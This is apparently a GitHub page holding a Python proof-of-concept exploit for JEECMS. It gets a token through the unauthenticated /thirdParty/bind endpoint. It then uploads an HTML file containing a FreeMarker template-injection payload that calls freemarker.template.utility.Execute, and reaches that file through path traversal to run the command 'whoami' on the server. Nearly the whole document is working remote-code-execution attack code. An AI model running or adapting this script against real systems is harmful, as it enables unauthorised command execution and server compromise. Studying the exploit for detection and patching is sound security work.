-
Notifications
You must be signed in to change notification settings - Fork 87
/
Copy pathJEECMS-o_upload-upload.py
86 lines (75 loc) · 3.14 KB
/
JEECMS-o_upload-upload.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#!/usr/bin/python
# -*- coding:utf-8 -*-
import requests
import sys
import json
import os
import time
import string
import argparse
import readchar
import random
from requests_toolbelt.multipart.encoder import MultipartEncoder
chars = string.ascii_letters
def random_string_generator(str_size, allowed_chars):
return ''.join(random.choice(allowed_chars) for x in range(str_size))
def getToken(url):
temp = "/thirdParty/bind"
target = url+temp
#print("checking url:" + target)
headers = {'Content-Type': 'application/json','User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','X-Requested-With':'XMLHttpRequest','Content-Length':'79'}
data = {"username":random_string_generator(5,chars),"loginWay": 1, "loginType": "QQ", "thirdId": "abcdefg"}
response = requests.post(url=target,headers=headers,json=data,verify=False)
if response.status_code ==200:
# print("111111")
null =""
text =response.text
obj = json.dumps(text)
t1 =json.loads(text)
token = t1['data']['JEECMS-Auth-Token']
print("JEECMS-Auth-Token: "+token)
return token
else:
print("get token error")
def getPath(url,token):
temp = "/member/upload/o_upload"
target = url+temp
shellCode = '''${site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.ObjectWrapper").getField("DEFAULT_WRAPPER").get(null).newInstance(site.getClass().getProtectionDomain().getClassLoader().loadClass("freemarker.template.utility.Execute"), null)(cmd)}'''
headers = {'Content-Type': 'multipart/form-data; boundary=-----------------------------1250178961143214655620108952','User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','X-Requested-With':'XMLHttpRequest','Content-Length':'606','JEECMS-Auth-Token':token}
multipart_encoder = MultipartEncoder(
fields={
"uploadFile": (
"b.html", shellCode, 'text/html'),
"typeStr": "File"
},
boundary='-----------------------------1250178961143214655620108952'
)
response = requests.post(url=target,headers=headers,data=multipart_encoder,verify=False)
if response.status_code ==200:
null =""
text =response.text
obj = json.dumps(text)
t1 =json.loads(text)
path = t1['data']['fileUrl']
return path
else:
print("get path error")
def verify(target_url):
token = getToken(url=target_url)
time.sleep(1)
path = getPath(target_url,token)
time.sleep(1)
path = path.replace("/","-")
temp ="/..-..-..-..-.."
url = target_url+temp+path
print("resultUrl: ",url)
url = url.replace("html","htm")
cmdurl = url+"?cmd=whoami"
return requests.get(cmdurl,verify=False).text
if __name__=="__main__":
target = sys.argv[1]
data = verify(target)
if data:
print("[+]漏洞存在,执行 whoami 的结果为:", data)
else:
print("[-]漏洞不存在")